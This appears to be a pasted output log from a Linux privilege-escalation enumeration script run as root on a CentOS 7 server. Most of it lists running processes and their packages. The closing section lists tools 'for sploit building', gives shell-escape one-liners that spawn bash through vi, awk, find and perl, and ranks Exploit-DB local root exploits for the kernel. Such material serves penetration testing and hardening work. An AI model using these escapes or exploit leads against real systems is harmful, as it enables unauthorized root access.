  5344. root 997 Apr01 0:26 [kworker/2:1H]
  5345. root 7432 Nov17 0:00 [kworker/3:0H]
  5346. root 667 Apr01 0:00 /usr/sbin/saslauthd
  5347. root 657 Apr01 69:01 /usr/lib/systemd/systemd-logind
  5348. root 687 Apr01 0:00 /sbin/agetty
  5349. root 15 Apr01 0:00 [kworker/1:0H]
  5350. root 423 Apr01 0:00 [xfs-buf/dm-1]
  5351. root 784 Apr01 32:00 /usr/sbin/NetworkManager
  5352. Possible Related Packages:
  5353. NetworkManager-1.4.0-20.el7_3.x86_64
  5354. NetworkManager-glib-1.4.0-20.el7_3.x86_64
  5355. NetworkManager-libnm-1.4.0-20.el7_3.x86_64
  5356. NetworkManager-tui-1.4.0-20.el7_3.x86_64
  5357. root 15717 22:10 0:00 [kworker/0:0]
  5358. root 28 Apr01 0:00 [netns]
  5359. root 607 Apr01 0:00 [xfs-reclaim/sda]
  5360. root 8269 21:00 0:00 /bin/bash
  5361. Possible Related Packages:
  5362. bash-4.2.46-21.el7_3.x86_64
  5363. root 15438 09:01 0:00 [kworker/3:2H]
  5364. root 13686 Jul10 26:57 /usr/bin/perl
  5365. Possible Related Packages:
  5366. mod_perl-2.0.10-2.el7.x86_64
  5367. perl-5.16.3-291.el7.x86_64
  5368. perl-Archive-Tar-1.92-2.el7.noarch
  5369. perl-BSD-Resource-1.29.07-1.el7.x86_64
  5370. perl-Business-ISBN-2.06-2.el7.noarch
  5371. perl-Business-ISBN-Data-20120719.001-2.el7.noarch
  5372. perl-CGI-3.63-4.el7.noarch
  5373. perl-Carp-1.26-244.el7.noarch
  5374. perl-Compress-Raw-Bzip2-2.061-3.el7.x86_64
  5375. perl-Compress-Raw-Zlib-2.061-4.el7.x86_64
  5376. perl-Crypt-OpenSSL-Bignum-0.04-18.el7.x86_64
  5377. perl-Crypt-OpenSSL-RSA-0.28-7.el7.x86_64
  5378. perl-Crypt-OpenSSL-Random-0.04-21.el7.x86_64
  5379. perl-Crypt-SSLeay-0.64-5.el7.x86_64
  5380. perl-DBD-MySQL-4.023-5.el7.x86_64
  5381. perl-DBD-Pg-2.19.3-4.el7.x86_64
  5382. perl-DBI-1.627-4.el7.x86_64
  5383. perl-DB_File-1.830-6.el7.x86_64
  5384. perl-Data-Dumper-2.145-3.el7.x86_64
  5385. perl-Digest-1.17-245.el7.noarch
  5386. perl-Digest-HMAC-1.03-5.el7.noarch
  5387. perl-Digest-MD5-2.52-3.el7.x86_64
  5388. perl-Digest-SHA-5.85-3.el7.x86_64
  5389. perl-Encode-2.51-7.el7.x86_64
  5390. perl-Encode-Detect-1.01-13.el7.x86_64
  5391. perl-Encode-Locale-1.03-5.el7.noarch
  5392. perl-Error-0.17020-2.el7.noarch
  5393. perl-Exporter-5.68-3.el7.noarch
  5394. perl-ExtUtils-Install-1.58-291.el7.noarch
  5395. perl-ExtUtils-MakeMaker-6.68-3.el7.noarch
  5396. perl-ExtUtils-Manifest-1.61-244.el7.noarch
  5397. perl-ExtUtils-ParseXS-3.18-2.el7.noarch
  5398. perl-FCGI-0.74-8.el7.x86_64
  5399. perl-File-Listing-6.04-7.el7.noarch
  5400. perl-File-Path-2.09-2.el7.noarch
  5401. perl-File-Temp-0.23.01-3.el7.noarch
  5402. perl-Filter-1.49-3.el7.x86_64
  5403. perl-Geo-IP-1.43-3.el7.x86_64
  5404. perl-Getopt-Long-2.40-2.el7.noarch
  5405. perl-HTML-Parser-3.71-4.el7.x86_64
  5406. perl-HTML-Tagset-3.20-15.el7.noarch
  5407. perl-HTTP-Cookies-6.01-5.el7.noarch
  5408. perl-HTTP-Daemon-6.01-5.el7.noarch
  5409. perl-HTTP-Date-6.02-8.el7.noarch
  5410. perl-HTTP-Message-6.06-6.el7.noarch
  5411. perl-HTTP-Negotiate-6.01-5.el7.noarch
  5412. perl-HTTP-Tiny-0.033-3.el7.noarch
  5413. perl-IO-Compress-2.061-2.el7.noarch
  5414. perl-IO-HTML-1.00-2.el7.noarch
  5415. perl-IO-Socket-INET6-2.69-5.el7.noarch
  5416. perl-IO-Socket-IP-0.21-4.el7.noarch
  5417. perl-IO-Socket-SSL-1.94-5.el7.noarch
  5418. perl-IO-Tty-1.10-11.el7.x86_64
  5419. perl-IO-Zlib-1.10-291.el7.noarch
  5420. perl-LWP-MediaTypes-6.02-2.el7.noarch
  5421. perl-Linux-Pid-0.04-18.el7.x86_64
  5422. perl-Mail-DKIM-0.39-8.el7.noarch
  5423. perl-Mail-SPF-2.8.0-4.el7.noarch
  5424. perl-MailTools-2.12-2.el7.noarch
  5425. perl-Net-DNS-0.72-6.el7.x86_64
  5426. perl-Net-Daemon-0.48-5.el7.noarch
  5427. perl-Net-HTTP-6.06-2.el7.noarch
  5428. perl-Net-IP-1.26-4.el7.noarch
  5429. perl-Net-LibIDN-0.12-15.el7.x86_64
  5430. perl-Net-SMTP-SSL-1.01-13.el7.noarch
  5431. perl-Net-SSLeay-1.55-4.el7.x86_64
  5432. perl-NetAddr-IP-4.069-3.el7.x86_64
  5433. perl-Package-Constants-0.02-291.el7.noarch
  5434. perl-PathTools-3.40-5.el7.x86_64
  5435. perl-PlRPC-0.2020-14.el7.noarch
  5436. perl-Pod-Escapes-1.04-291.el7.noarch
  5437. perl-Pod-Perldoc-3.20-4.el7.noarch
  5438. perl-Pod-Simple-3.28-4.el7.noarch
  5439. perl-Pod-Usage-1.63-3.el7.noarch
  5440. perl-Scalar-List-Utils-1.27-248.el7.x86_64
  5441. perl-Socket-2.010-4.el7.x86_64
  5442. perl-Socket6-0.23-15.el7.x86_64
  5443. perl-Storable-2.45-3.el7.x86_64
  5444. perl-Switch-2.16-7.el7.noarch
  5445. perl-Sys-Syslog-0.33-3.el7.x86_64
  5446. perl-Test-Harness-3.28-3.el7.noarch
  5447. perl-Text-ParseWords-3.29-4.el7.noarch
  5448. perl-Time-HiRes-1.9725-3.el7.x86_64
  5449. perl-Time-Local-1.2300-2.el7.noarch
  5450. perl-TimeDate-2.30-2.el7.noarch
  5451. perl-URI-1.60-9.el7.noarch
  5452. perl-WWW-RobotRules-6.02-5.el7.noarch
  5453. perl-XML-NamespaceSupport-1.11-10.el7.noarch
  5454. perl-XML-Parser-2.41-10.el7.x86_64
  5455. perl-XML-SAX-0.99-9.el7.noarch
  5456. perl-XML-SAX-Base-1.08-7.el7.noarch
  5457. perl-XML-Simple-2.20-5.el7.noarch
  5458. perl-constant-1.27-2.el7.noarch
  5459. perl-devel-5.16.3-291.el7.x86_64
  5460. perl-libs-5.16.3-291.el7.x86_64
  5461. perl-libwww-perl-6.05-2.el7.noarch
  5462. perl-macros-5.16.3-291.el7.x86_64
  5463. perl-parent-0.225-244.el7.noarch
  5464. perl-podlators-2.5.1-3.el7.noarch
  5465. perl-threads-1.87-4.el7.x86_64
  5466. perl-threads-shared-1.43-6.el7.x86_64
  5467. perl-version-0.99.07-2.el7.x86_64
  5468. root 16 Apr01 2:39 [watchdog/2]
  5469. root 396 Apr01 0:00 [bioset]
  5470. root 28228 Oct27 10:06 /usr/sbin/httpd
  5471. Possible Related Packages:
  5472. httpd-2.4.6-45.el7.centos.4vm.x86_64
  5473. httpd-tools-2.4.6-45.el7.centos.4vm.x86_64
  5474. root 7 Apr01 2:17 [migration/0]
  5475. root 17393 Jul10 18:31 /usr/bin/python
  5476. Possible Related Packages:
  5477. dbus-python-1.1.1-9.el7.x86_64
  5478. libselinux-python-2.5-6.el7.x86_64
  5479. newt-python-0.52.15-4.el7.x86_64
  5480. python-2.7.5-48.el7.x86_64
  5481. python-backports-1.0-8.el7.x86_64
  5482. python-backports-ssl_match_hostname-3.4.0.2-4.el7.noarch
  5483. python-configobj-4.7.2-7.el7.noarch
  5484. python-decorator-3.4.0-3.el7.noarch
  5485. python-dns-1.12.0-2.20150617git465785f.el7.noarch
  5486. python-firewall-0.4.3.2-8.1.el7_3.3.noarch
  5487. python-iniparse-0.4-9.el7.noarch
  5488. python-libs-2.7.5-48.el7.x86_64
  5489. python-perf-3.10.0-514.26.2.el7.x86_64
  5490. python-pycurl-7.19.0-19.el7.x86_64
  5491. python-pyudev-0.15-7.el7_2.1.noarch
  5492. python-setuptools-0.9.8-4.el7.noarch
  5493. python-slip-0.4.0-2.el7.noarch
  5494. python-slip-dbus-0.4.0-2.el7.noarch
  5495. python-urlgrabber-3.10-8.el7.noarch
  5496. rpm-python-4.11.3-21.el7.x86_64
  5497. root 22 Apr01 3:06 [migration/3]
  5498. root 883 Apr01 0:00 /usr/lib/vmware-vgauth/VGAuthService
  5499. root 15688 22:10 0:00 [kworker/u8:1]
  5500. root 1183 Apr01 35:28 /usr/sbin/rsyslogd
  5501. root 292 Apr01 0:00 [scsi_tmf_0]
  5502. root 429 Apr01 0:00 [xfs-eofblocks/d]
  5503. root 603 Apr01 0:00 [xfs-buf/sda1]
  5504. root 29 Apr01 0:11 [khungtaskd]
  5505. root 23 Apr01 6:25 [ksoftirqd/3]
  5506. root 15247 22:05 0:00 [kworker/0:1]
  5507. root 616 Apr01 6:57 [jbd2/sdb1-8]
  5508. root 9931 21:20 0:01 [kworker/3:0]
  5509. root 604 Apr01 0:00 [xfs-data/sda1]
  5510. root 44 Apr01 0:00 [ksmd]
  5511. root 3170 19:50 0:00 [kworker/1:0]
  5512. root 430 Apr01 85:39 [xfsaild/dm-1]
  5513. root 79 Apr01 0:00 [deferwq]
  5514. root 2 Apr01 0:11 [kthreadd]
  5515. root 14519 21:55 0:00 [kworker/2:0]
  5516. root 27667 Oct27 0:00 /usr/sbin/sshd
  5517. root 27 Apr01 0:00 [kdevtmpfs]
  5518. root 1284 Apr01 0:00 /usr/sbin/dovecot
  5519. Possible Related Packages:
  5520. dovecot-2.2.10-7.el7.x86_64
  5521. root 45 Apr01 39:05 [khugepaged]
  5522. root 670 Apr01 0:00 /usr/sbin/saslauthd
  5523. root 32 Apr01 0:00 [bioset]
  5524. root 395 Apr01 0:00 [kdmflush]
  5525. root 16310 22:15 0:00 [kworker/1:1]
  5526. root 1 Apr01 150:20 /usr/lib/systemd/systemd
  5527. Possible Related Packages:
  5528. clamav-scanner-systemd-0.99.2-3.el7.centos.vm.noarch
  5529. clamav-server-systemd-0.99.2-3.el7.centos.vm.noarch
  5530. systemd-219-30.el7_3.9.x86_64
  5531. systemd-libs-219-30.el7_3.9.x86_64
  5532. systemd-sysv-219-30.el7_3.9.x86_64
  5533. root 8264 21:00 0:00 /usr/sbin/CROND
  5534. root 17 Apr01 2:17 [migration/2]
  5535. root 16559 22:20 0:00 [kworker/3:2]
  5536. root 16173 22:15 0:00 [kworker/2:2]
  5537. root 43 Apr01 118:29 [kswapd0]
  5538. root 30 Apr01 0:00 [writeback]
  5539. root 633 Apr01 8:48 /sbin/auditd
  5540. root 427 Apr01 0:00 [xfs-reclaim/dm-]
  5541. root 18 Apr01 2:20 [ksoftirqd/2]
  5542. root 424 Apr01 0:00 [xfs-data/dm-1]
  5543. root 11254 21:36 0:00 [kworker/0:1H]
  5544. root 58 Apr01 0:00 [kpsmoused]
  5545. root 669 Apr01 0:00 /usr/sbin/saslauthd
  5546. root 8271 21:00 0:00 sleep
  5547. root 668 Apr01 0:00 /usr/sbin/saslauthd
  5548. root 425 Apr01 0:00 [xfs-conv/dm-1]
  5549. root 9004 14:52 0:00 [kworker/0:0H]
  5550. root 308 Apr01 0:00 [scsi_eh_2]
  5551. root 16951 Jul10 3:46 /usr/bin/perl
  5552. Possible Related Packages:
  5553. mod_perl-2.0.10-2.el7.x86_64
  5554. perl-5.16.3-291.el7.x86_64
  5555. perl-Archive-Tar-1.92-2.el7.noarch
  5556. perl-BSD-Resource-1.29.07-1.el7.x86_64
  5557. perl-Business-ISBN-2.06-2.el7.noarch
  5558. perl-Business-ISBN-Data-20120719.001-2.el7.noarch
  5559. perl-CGI-3.63-4.el7.noarch
  5560. perl-Carp-1.26-244.el7.noarch
  5561. perl-Compress-Raw-Bzip2-2.061-3.el7.x86_64
  5562. perl-Compress-Raw-Zlib-2.061-4.el7.x86_64
  5563. perl-Crypt-OpenSSL-Bignum-0.04-18.el7.x86_64
  5564. perl-Crypt-OpenSSL-RSA-0.28-7.el7.x86_64
  5565. perl-Crypt-OpenSSL-Random-0.04-21.el7.x86_64
  5566. perl-Crypt-SSLeay-0.64-5.el7.x86_64
  5567. perl-DBD-MySQL-4.023-5.el7.x86_64
  5568. perl-DBD-Pg-2.19.3-4.el7.x86_64
  5569. perl-DBI-1.627-4.el7.x86_64
  5570. perl-DB_File-1.830-6.el7.x86_64
  5571. perl-Data-Dumper-2.145-3.el7.x86_64
  5572. perl-Digest-1.17-245.el7.noarch
  5573. perl-Digest-HMAC-1.03-5.el7.noarch
  5574. perl-Digest-MD5-2.52-3.el7.x86_64
  5575. perl-Digest-SHA-5.85-3.el7.x86_64
  5576. perl-Encode-2.51-7.el7.x86_64
  5577. perl-Encode-Detect-1.01-13.el7.x86_64
  5578. perl-Encode-Locale-1.03-5.el7.noarch
  5579. perl-Error-0.17020-2.el7.noarch
  5580. perl-Exporter-5.68-3.el7.noarch
  5581. perl-ExtUtils-Install-1.58-291.el7.noarch
  5582. perl-ExtUtils-MakeMaker-6.68-3.el7.noarch
  5583. perl-ExtUtils-Manifest-1.61-244.el7.noarch
  5584. perl-ExtUtils-ParseXS-3.18-2.el7.noarch
  5585. perl-FCGI-0.74-8.el7.x86_64
  5586. perl-File-Listing-6.04-7.el7.noarch
  5587. perl-File-Path-2.09-2.el7.noarch
  5588. perl-File-Temp-0.23.01-3.el7.noarch
  5589. perl-Filter-1.49-3.el7.x86_64
  5590. perl-Geo-IP-1.43-3.el7.x86_64
  5591. perl-Getopt-Long-2.40-2.el7.noarch
  5592. perl-HTML-Parser-3.71-4.el7.x86_64
  5593. perl-HTML-Tagset-3.20-15.el7.noarch
  5594. perl-HTTP-Cookies-6.01-5.el7.noarch
  5595. perl-HTTP-Daemon-6.01-5.el7.noarch
  5596. perl-HTTP-Date-6.02-8.el7.noarch
  5597. perl-HTTP-Message-6.06-6.el7.noarch
  5598. perl-HTTP-Negotiate-6.01-5.el7.noarch
  5599. perl-HTTP-Tiny-0.033-3.el7.noarch
  5600. perl-IO-Compress-2.061-2.el7.noarch
  5601. perl-IO-HTML-1.00-2.el7.noarch
  5602. perl-IO-Socket-INET6-2.69-5.el7.noarch
  5603. perl-IO-Socket-IP-0.21-4.el7.noarch
  5604. perl-IO-Socket-SSL-1.94-5.el7.noarch
  5605. perl-IO-Tty-1.10-11.el7.x86_64
  5606. perl-IO-Zlib-1.10-291.el7.noarch
  5607. perl-LWP-MediaTypes-6.02-2.el7.noarch
  5608. perl-Linux-Pid-0.04-18.el7.x86_64
  5609. perl-Mail-DKIM-0.39-8.el7.noarch
  5610. perl-Mail-SPF-2.8.0-4.el7.noarch
  5611. perl-MailTools-2.12-2.el7.noarch
  5612. perl-Net-DNS-0.72-6.el7.x86_64
  5613. perl-Net-Daemon-0.48-5.el7.noarch
  5614. perl-Net-HTTP-6.06-2.el7.noarch
  5615. perl-Net-IP-1.26-4.el7.noarch
  5616. perl-Net-LibIDN-0.12-15.el7.x86_64
  5617. perl-Net-SMTP-SSL-1.01-13.el7.noarch
  5618. perl-Net-SSLeay-1.55-4.el7.x86_64
  5619. perl-NetAddr-IP-4.069-3.el7.x86_64
  5620. perl-Package-Constants-0.02-291.el7.noarch
  5621. perl-PathTools-3.40-5.el7.x86_64
  5622. perl-PlRPC-0.2020-14.el7.noarch
  5623. perl-Pod-Escapes-1.04-291.el7.noarch
  5624. perl-Pod-Perldoc-3.20-4.el7.noarch
  5625. perl-Pod-Simple-3.28-4.el7.noarch
  5626. perl-Pod-Usage-1.63-3.el7.noarch
  5627. perl-Scalar-List-Utils-1.27-248.el7.x86_64
  5628. perl-Socket-2.010-4.el7.x86_64
  5629. perl-Socket6-0.23-15.el7.x86_64
  5630. perl-Storable-2.45-3.el7.x86_64
  5631. perl-Switch-2.16-7.el7.noarch
  5632. perl-Sys-Syslog-0.33-3.el7.x86_64
  5633. perl-Test-Harness-3.28-3.el7.noarch
  5634. perl-Text-ParseWords-3.29-4.el7.noarch
  5635. perl-Time-HiRes-1.9725-3.el7.x86_64
  5636. perl-Time-Local-1.2300-2.el7.noarch
  5637. perl-TimeDate-2.30-2.el7.noarch
  5638. perl-URI-1.60-9.el7.noarch
  5639. perl-WWW-RobotRules-6.02-5.el7.noarch
  5640. perl-XML-NamespaceSupport-1.11-10.el7.noarch
  5641. perl-XML-Parser-2.41-10.el7.x86_64
  5642. perl-XML-SAX-0.99-9.el7.noarch
  5643. perl-XML-SAX-Base-1.08-7.el7.noarch
  5644. perl-XML-Simple-2.20-5.el7.noarch
  5645. perl-constant-1.27-2.el7.noarch
  5646. perl-devel-5.16.3-291.el7.x86_64
  5647. perl-libs-5.16.3-291.el7.x86_64
  5648. perl-libwww-perl-6.05-2.el7.noarch
  5649. perl-macros-5.16.3-291.el7.x86_64
  5650. perl-parent-0.225-244.el7.noarch
  5651. perl-podlators-2.5.1-3.el7.noarch
  5652. perl-threads-1.87-4.el7.x86_64
  5653. perl-threads-shared-1.43-6.el7.x86_64
  5654. perl-version-0.99.07-2.el7.x86_64
  5655. root 426 Apr01 0:00 [xfs-cil/dm-1]
  5656. root 610 Apr01 0:00 [xfsaild/sda1]
  5657. root 1855 Apr01 1:41 /usr/libexec/postfix/master
  5658. root 113 Apr01 2:24 [kauditd]
  5659. root 31 Apr01 0:00 [kintegrityd]
  5660. root 16709 22:20 0:00 [kworker/1:2]
  5661. root 57 Apr01 0:00 [kmpath_rdacd]
  5662. root 47 Apr01 0:00 [crypto]
  5663. root 10 Apr01 2:25 [watchdog/0]
  5664. root 506 Apr01 94:55 /usr/lib/systemd/systemd-journald
  5665. root 404 Apr01 0:00 [bioset]
  5666. root 13777 Jul10 0:00 /usr/lib/systemd/systemd-udevd
  5667. root 46 Apr01 0:00 [fsnotify_mark]
  5668. root 605 Apr01 0:00 [xfs-conv/sda1]
  5669. root 9071 21:08 0:00 [kworker/u8:0]
  5670. root 297 Apr01 0:00 [mpt_poll_0]
  5671. root 608 Apr01 0:00 [xfs-log/sda1]
  5672. root 13 Apr01 10:43 [ksoftirqd/1]
  5673. root 20 Apr01 0:00 [kworker/2:0H]
  5674. root 298 Apr01 0:00 [mpt/0]
  5675. root 13725 Jul10 3:14 /usr/sbin/crond
  5676. root 422 Apr01 0:00 [xfs_mru_cache]
  5677. root 288 Apr01 0:00 [ata_sff]
  5678. root 946 Apr01 117:45 /usr/lib/vmware-caf/pme/bin/ManagementAgentHost
  5679. root 33 Apr01 0:00 [kblockd]
  5680. root 312 Apr01 0:00 [ttm_swap]
  5681. root 17570 Jul10 20:51 /usr/sbin/irqbalance
  5682. Possible Related Packages:
  5683. irqbalance-1.0.7-6.el7_3.1.x86_64
  5684. root 428 Apr01 0:00 [xfs-log/dm-1]
  5685. root 291 Apr01 0:00 [scsi_eh_0]
  5686. root 9 Apr01 250:48 [rcu_sched]
  5687.  
  5688. [*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...
  5689.  
  5690. [+] Installed Tools
  5691. /usr/bin/awk
  5692. /usr/bin/perl
  5693. /usr/bin/python
  5694. /usr/bin/ruby
  5695. /usr/bin/vi
  5696. /usr/bin/find
  5697. /usr/bin/nc
  5698. /usr/bin/wget
  5699.  
  5700. [+] Related Shell Escape Sequences...
  5701.  
  5702. vi--> :!bash
  5703. vi--> :set shell=/bin/bash:shell
  5704. awk--> awk 'BEGIN {system("/bin/bash")}'
  5705. find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
  5706. perl--> perl -e 'exec "/bin/bash";'
  5707.  
  5708. [*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
  5709.  
  5710. Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
  5711.  
  5712. The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
  5713. - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
  5714.  
  5715. The following exploits are applicable to this kernel version and should be investigated as well
  5716. - Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
  5717. - Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby
  5718. - CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
  5719. - CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
  5720. - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
  5721. - open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
  5722. - open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
  5723.  
  5724. Finished
  5725. =================================================================================================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement